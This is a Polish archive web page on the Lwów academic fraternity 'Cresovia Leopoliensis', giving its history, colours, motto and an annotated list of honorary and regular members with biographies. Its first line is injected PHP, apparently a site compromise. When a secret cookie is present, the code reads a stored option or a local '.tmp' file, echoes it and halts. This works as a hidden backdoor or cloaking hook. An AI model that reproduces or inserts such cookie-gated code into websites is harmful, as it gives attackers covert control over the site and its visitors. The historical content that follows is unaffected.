if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Cresovia Leopoliensis

Dekiel Cresovii Leopoliensis - vide Poszukiwania. Nazwa:
Polska Korporacja Akademicka “Cresovia Leopoliensis” we Lwowie
Siedziba:
Lwów
Data powstania:
wrzesień 1927 r.
Barwy:
amarantowa – zielona – srebrna
Dewiza:
„I ten szczęśliwy, kto padł wśród zawodu, jeżeli poległym ciałem da innym szczebel do sławy grodu”

Rys historyczny

Cresovia, Lwów ok. 1934 r.

Cresovia została założona we wrześniu 1926 r. przez grupę słuchaczy Uniwersytetu Jana Kazimierza i Politechniki Lwowskiej. Korporacja jednoczyła studentów pochodzących z Kresów Południowo-Wschodnich Rzeczypospolitej.

Banda korporacyjna prawdopodobnie Cresovii.

Od 1927 r. Cresovia należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 20 VI 1927 r.). Kandydowała pod opieką K! Znicz. Dnia 7 XII 1928 r. uzyskała prawa członka rzeczywistego Związku.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 75 nazwisk, w tym ośmiu członków honorowych.

Bal korporacyjny, Lwów 1930 r.

Brak wiadomości o powojennej działalności korporacji i spotkaniach jej członków

Lista członków

Poniższa, niekompletna lista członków Cresovii obejmuje 75 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Stanisław Grabski, (5 kwietnia 1871 w Borowie nad Bzurą - 6 maja 1949 w Sulejówku) z rodziny ziemiańskiej, prof. ekonomii ULw./UJK, Akademii Rolniczej w Dublanach, UJ, o od 1947 UW, w młodości działacz socjalistyczny, od 1902 związany z obozem narodowym, od 1906 członek władz Ligi Narodowej, od 1907 wiceprezes Stronnictwa Narodowo-Demokratycznego w Galicji, członek Komitetu Narodowego Polskiego w Paryżu, członek delegacji negocjującej traktat ryski 1921, poseł na Sejm z listy Związku Ludowo-Narodowego 1919-27, minister wyznań religijnych i oświecenia publicznego 1923 oraz 1925-26, po przewrocie majowym w 1926 wycofał się z życia politycznego i poświęcił się pracy naukowej i publicystycznej, Filister honorowy Znicza, Cresovii Leopoliensis, Avanguardii, po zajęciu Lwowa przez Rosjan w 1939 aresztowany przez NKWD i uwięziony 1939-41, po układzie Sikorski-Majski uwolniony, wyjechał do Londynu, przewodniczący II Rady Narodowej RP 1942-44, w 1945 wraz ze Stanisławem Mikołajczykiem wrócił do Polski, jeden z wiceprezesów Krajowej Rady Narodowej 1945-47, od stycznia 1947 kierownik katedry ustrojów społecznych na Wydziale Prawa UW, pochowany na Cmentarzu Powązkowskim w Warszawie
 2. Franciszek (Karol?) Irzyk, wiceprezydent miasta Lwowa, rozstrzelany przez bolszewików, Filister honorowy Cresovii Leopoliensis
 3. Aleksander Medyński, historyk, literat, dziennikarz, prof. i dyrektor gimnazjum, autor m.in. przewodnika “Ilustrowany przewodnik po Cmentarzu Łyczakowskim” (1937), Filister honorowy Cresovii Leopoliensis
 4. Kalikst Oppenauer, dr med., Filister honorowy Cresovii Leopoliensis
 5. Kazimierz Nałęcz-Rychłowski, (7 stycznia 1878 w Płocku - 10 stycznia 1941 we Lwowie) ojciec Stanisława (Cresovia), s. Brunona i Felicji z d. Bethley, absolwent Gimnazjum św. Jacka w Krakowie 1895, studiował romanistykę, germanistykę i polonistykę, medycyną UJ, poeta, dziennikarz, tłumacz, przekładał na język polski utwory m.in. H. Heinego, F. Schillera, J. A. Rimbaud, R. Baden-Powella, J. O. Curwood’a, P. Verlaine’a, redaktor miesięcznika “Torpeda” oraz tygodnika dla młodzieży “Na Progu Życia”, Filister honorowy Cresovii, pochowany na Cmentarzu Janowskim we Lwowie
 6. Władysław Szymonowicz, (21 marca 1869 w Tarnopolu - 10 marca 1939 we Lwowie) uczeń Gimnazjum im. Franciszka Józefa we Lwowie 1880-82, student med. UJ 1887-93, dr med. UJ 1895, od 1898 prof. i kierownik Zakładu Histologiczno-Embrionalnego UJK, dziekan Wydziału Lekarskiego 1906/07, w 1895 wraz z Napoleonem Cybulskim odkrył hormonalne oddziaływanie rdzenia nadnerczy i wyizolował adrenalinę, członek czynny PAU oraz Towarzystwa Naukowego we Lwowie, Filister honorowy Cresovii Leopoliensis, pochowany na Cmentarzu Łyczakowskim
 7. Władysław Świrski, (1894 - 1971 we Wrocławiu) w młodości członek “Teki” i ZET, dr nauk ekonomicznych, dziennikarz, działacz polityczny związany z Narodową Demokracją, uczestnik wojny polsko-rosyjskiej 1920, w okresie plebiscytu na Górnym Śląsku członek Komitetu Pomocy dla Śląska w Krakowie, prezes Związku Hallerczyków, Filister honorowy Cresovii Leopoliensis, w okresie okupacji we władzach Okręgu Lwowskiego ZWZ-AK, członek Delegatury Rządu Londyńskiego, aresztowany w sierpniu 1944 przez NKWD, skazany na 20 lat łagrów (Woroszyłowgrad, Charków, obozy w Mordowskiej ASRR), wrócił do Polski w 1956
 8. Henryk Zbierzchowski, (19 listopada 1881 we Lwowie - 11 listopada 1942 w Krynicy) absolwent prawa ULw., poeta, prozaik, dramatopisarz, bard Lwowa, ps. literacki “Nemo”, pracownik redakcji czasopisma “Nasz Kraj” 1906-10, poeta lwowskiej “Gazety Porannej”, red. lwowskiego tygodnika satyrycznego “Szczutek” 1920-26, wyróżniony Złotym Wawrzynem Polskiej Akademii Literatury 1928 oraz nagrodą literacką miasta Lwowa, Filister honorowy Cresovii Leopoliensis, zmarł na skutek ciężkich warunków okupacyjnych, pochowany w Krynicy, o jego twórczości ukazała się praca: Witold Waszczuk, “Pisarz wobec koniunktury. Twórczość literacka Henryka Zbierzchowskiego” (2000)

Fidułka Cresovii, Lwów prawd. ok. 1933 r.

Członkowie rzeczywiści

 1. Marian Barket, (1909 we Lwowie-1985) akt. 1927-33, lekarz med., chirurg
 2. Aleksander Baumgarten, (31 maja 1908 w Krakowie - 1980 w Katowicach) student UJK, założyciel i autor hymnu Cresovii, olderman sem. zim. 1927/28 (od grudnia), sekretarz 1929, wiceprezes 1930, olderman 1931, poeta i prozaik związany z grupą literacką “Rybałci”, w czasie okupacji w tajnym nauczaniu, po wojnie w zespole Teatru im. S. Wyspiańskiego w Katowicach, kierownik red. literackiej Polskiego Radia w Katowicach, kierownik literacki Państwowego Teatru Zagłębia w Sosnowcu oraz Teatru Polskiego w Bielsku, autor powieści i opowiadań, nagrodzony m.in. nagrodą miasta Katowice 1956 oraz nagrodą Wojewódzkiej Rady Narodowej za całokształt twórczości 1967
 3. Władysław Biłogan, student UJK, założyciel Cresovii, po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 4. Zbigniew Bober, akt. 1928-33, mgr praw
 5. Bronisław Borczyca, student i absolwent prawa UJK< akt. 1932-37
 6. Władysław Bójko, student UJK, akt. 1935-39, pchor. rez., uczestnik wojny obronnej 1939, po powrocie do domu aresztowany przez NKWD i deportowany do łagru na Syberii, w II Korpusie PSZ na Zachodzie, zginął na Oceanie Indyjskim po storpedowaniu przez niemiecki U-Boot statku “SSM Latona (Latonia)”, który konwojował jeńców włoskich
 7. Jan Branicki, założyciel Cresovii
 8. Jerzy Chodorowski, w czasie II wojny światowej w konspiracji
 9. Stanisław Długopolski, ( - 1983 w Nowym Sączu) akt. 1928-31, mgr praw, adwokat
 10. Jan Dyktalewicz (Dyhdalewicz ?), student UJK, założyciel Cresovii
 11. Bolesław Ekes, (1907 we Lwowie - ) student PL, akt. 1928-32
 12. Rudolf Frymauth, ( - 5 listopada 1927)
 13. Jan Geilhofer, student i absolwent weterynarii AMW, olderman 1929, prezes 1930, olderman 1932
 14. Aleksander Głowa, student prawa UJK, akt. 1927-31
 15. Romuald Górczyński, student PL, założyciel Cresovii, sekretarz sem. let. 1926/27, sekretarz 1929, prezes 1930, sekretarz 1931
 16. Bronisław Hyrczek,
 17. Eugeniusz Janicki, założyciel Cresovii
 18. Zdzisław Judycki, (1907-1963) c. 1929, prezes Bratniej Pomocy we Lwowie
 19. Bronisław Kacowski, student UJK, c. 1927
 20. Władysław Kaczkowski, student UJK, c. 1927
 21. Juliusz Kierchner, sekretarz 1932
 22. Antoni Kowal, założyciel Cresovii
 23. Włodzimierz Krzyżak, założyciel Cresovii
 24. Kazimierz Krzyżanowski, założyciel Cresovii, olderman 1927

  Zdzisław Kunstman, prawd. ok. 1932 r.

 25. Zdzisław Kunstman, (27 stycznia 1909 w Rakszawie w pow. łańcuckim - 13 października 1968 w Poznaniu) s. Jana i Janiny z d. Wojakiewicz, absolwent Gimnazjum Humanistycznego w Łańcucie, student i absolwent filologii polskiej UJK oraz filologii słowiańskiej Uniwerystet Karola w Pradze, odbył służbę wojskową w 17 Pułku Piechoty z Rzeszowa i 39 Pułku Piechoty z Jarosławia, poeta i literat, od 1929 pracował w piśmie “Słowo Polskie” i “Wiek Nowy”, od 1935 jako speaker w rozgłośni Polskiego Radia we Lwowie, od 1936 w rozgłośni w Warszawie, 1937-39 w wydziale programowym w rozgłośni w Łodzi, w wojnie obronnej 1939 w obronie Warszawy, w czasie okupacji żołnierz ZWZ-AK 1940-44 ps. “Grottger”, redaktor czasopisma konspiracyjnego “Odwet”, od 1945 pracował jako dziennikarz w Polskim Radiu w Bydgoszczy, a od 1950 w Polskim Radiu w Szczecinie, od 1957 jako sprawozdawca-reportażysta w Poznaniu, odznaczony Złotą Odznaką Miłośnika Miasta Poznania oraz Złotym Krzyżem Zasługi, pochowany na cmentarzu na Junikowie w Poznaniu

 26. Tadeusz Laskowski, student UJK, założyciel Cresovii, II wiceprezes sem. zim. 1927/28 (od grudnia)
 27. Zygmunt Leitl (Laitl), student UJK, założyciel Cresovii, wiceprezes 1927
 28. Władysław Lewicki, student UJK, założyciel Cresovii, wiceprezes 1929
 29. Władysław Łoziński, mgr praw
 30. Edmund Malikowski, (zm. w Tarnowie) wiceprezes 1932, mgr praw, adwokat
 31. Roman Matuszewski, student i absolwent AMW, wiceprezes 1929
 32. Jan Mazur, (1915-1940) z Podhala, s. Klemensa i Marii z d. Kawulok, student polonistyki na Wydziale Filozoficznym UJK, poeta gwary góralskiej, aresztowany przez NKWD we Lwowie i deportowany na Wschód [wg innych relacji zamordowany w 1939 w więzieniu]
 33. Jan Motak, student UJK, założyciel Cresovii, mgr praw, adwokat
 34. Bronisław Musiałowicz, (ok. 1901 - 1988) akt. 1929-34, olderman 1930
 35. Jan Nowicki, ( - 4 października 1927) utonął w Dnieprze
 36. Marian Ogibiński, student UJK, c. 1927
 37. Henryk Panas, (4 stycznia 1912 we Lwowie - 11 września 1985 w Olsztynie) brat Piotra (Cresovia), student i absolwent polonistyki UJK, akt. 1930-35, wiceprezes 1932, uczestnik wojny obronnej 1939, więzień łagru w Workucie 1940-41, żołnierz II Korpusu PSZ 1941-46, m.in. walczył pod Monte Cassino, wrócił do Polski w 1947, mieszkał we Wrocławiu, Kamionkach k. Giżycka, a od 1956 w Olsztynie, prozaik, dramaturg i publicysta, dyrektor liceum w Olsztynie, działacz PZPR, red. naczelny miesięcznika “Warmia i Mazury” 1958-72, autor powieści, opowiadań, esejów, nagrodzony: nagrodą wojewódzką w Olsztynie 1963 oraz 1965, nagrodą miesięcznika “Warmia i Mazury” 1972 oraz nagrodą tygodnika “Kultura” za powieść “Według Judasza. Apokryf”
 38. Piotr Panas, brat Henryka (Cresovia)
 39. Zygmunt Piąty-Piąciński, akt. 1927-31, prezes 1929, mgr prawa
 40. Jan (Stanisław ?) Pieniążek, student PL, założyciel Cresovii
 41. Władysław Rapaczyński, założyciel Cresovii, po wojnie na emigracji w Argentynie (?)
 42. Kazimierz Rosicki, c. 1931, mgr praw, w 1950 Naczelnik Wydziału w Ministerstwie Administracji Publicznej w Warszawie
 43. Kazimierz Rut, akt. 1932-38, wiceprezes Bratniej Pomocy UJK 1934
 44. Stanisław Rychłowski, s. Kazimierza (Cresovia), student UJK, założyciel Cresovii, wiceprezes 1927, prezes 1928
 45. Ludwik Czesław Samolewicz, (21 maja 1905 we Lwowie - 8 stycznia 1981 w Zabrzu) student i absolwent 1935 med. UJK, akt. 1928-34, skarbnik 1930, prezes 1932, starszy asystent med. UJK, dr med. 1952, neurolog, po wojnie pracował z zakładach opieki zdrowotnej w Gliwicach i Zabrzu oraz jako lekarz przemysłowy Hut “Zabrze”, odznaczony m.in. Złotym Krzyżem Zasługi
 46. Schmidt,
 47. Adam Sikorski, student UJK, założyciel Cresovii, akt. 1927-32, sekretarz 1929
 48. Zbigniew Soika, założyciel Cresovii
 49. Ludwik Stanisław Sosabowski, (1916 - ) student i absolwent UJK, w czasie okupacji sowieckiej aresztowany przez NKWD i zesłany do Kazachstanu, żołnierz II Korpusu PSZ na Zachodzie, m.in. uczestnik walk pod Monte Cassino, odznaczony m.in. Srebrnym Krzyżem Virtuti Militari 1945, kpt. WP
 50. Władysław Sosabowski, ze Stanisławowa
 51. Stanisław Strzelbicki, student UJK, założyciel Cresovii

  Zbigniew Stuchły, lata 20-te.

 52. Zbigniew (Adam Zbigniew) Stuchly, (5 maja 1907 we Lwowie - 7 sierpnia 2005 we Wrocławiu) student medycyny i student i absolwent biologii UJK, założyciel Cresovii, akt. 1926-28, prezes sem. zim. 1927/28 (od grudnia), asystent Zakładu Biologii Ogólnej UJK 1927-44, kierownik działu produkcji szczepionki przeciw tyfusowi w Instytucie Rudolfa Weigla, w czasie okupacji nauczyciel na tajnych kompletach, po wojnie adiunkt w Zakładzie Biologii Ogólnej UMCS 1946-50, a następnie prof., organizator i kierownik Katedry i Zakładu Biologii Ogólnej AM we Wrocławiu, pochowany na Cmentarzu Grabiszyńskim we Wrocławiu

 53. Marian Szymański, student PL, założyciel Cresovii
 54. Adam Toruń, akt. 1931-38, mgr praw, notariusz
 55. Kazimierz Turczynowski, mgr praw, adwokat
 56. Tadeusz Twardowski, (22 stycznia 1911 we Lwowie - 1 listopada 1984 w Gdańsku) student i absolwent 1936 prawa UJK, c. 1929, wielokrotny sekretarz, wiceprezes, prezes i olderman, ppor. artylerii przeciwlotniczej, żołnierz wojny obronnej 1939, w 1941 aresztowany przez NKWD, torturowany, wywieziony na Wschód, żołnierz II Korpusu PSZ, w 1948 wrócił do kraju, sędzia i radca prawny
 57. Tadeusz Tyrawski, student UJK, c. 1927
 58. Julian Udała, student UJK, założyciel Cresovii, prezes sem. let. 1926/27
 59. Henryk Urbanek, akt. 1929-33
 60. Franciszek Vogel, student UJK, założyciel Cresovii, I wiceprezes sem. zim. 1927/28 (od grudnia), olderman 1928, prezes 1929, mgr praw
 61. Seweryn Vogl, akt. 1928-33, mgr praw
 62. Tadeusz Wiszniewski, założyciel Cresovii
 63. Włodzimierz Wołoszyn, założyciel Cresovii, sekretarz sem. zim. 1927/28 (od grudnia), wiceprezes 1928, wydalony w maju 1929 “cum infamia externa”
 64. Adam Zaczek, (1908-1967) akt. 1929-34
 65. Mieczysław Zaloth, akt. 1930-34
 66. Stanisław Zaloth, akt. 1932-39, sekretarz, wiceprezes, prezes, mgr praw, ppor. rez., uczestnik wojny obronnej 1939, deportowany na Sybir, w Polskich Siłach Zbrojnych na Zachodzie, po wojnie na emigracji w Kanadzie
 67. Jan Zieliński, (1912 - 29 lipca 1970 w Warszawie) akt. 1931-39, mgr praw

Listę członków opracowano na podstawie:

1) Zbysław Popławski, Lista członków Polskiej Korporacji Akademickiej Cresovia Leopoliensis (Lwów), (w:) Polskie Korporacje Akademickie 1996, nr 11, s. 88 i n.,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Cresovia Leopoliensis.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 14 IX 2010 r.
Ostatnia zmiana: 30 X 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka “Cresovia Leopoliensis” we Lwowie, (na:) www.archiwumkorporacyjne.pl, stan 30 X 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }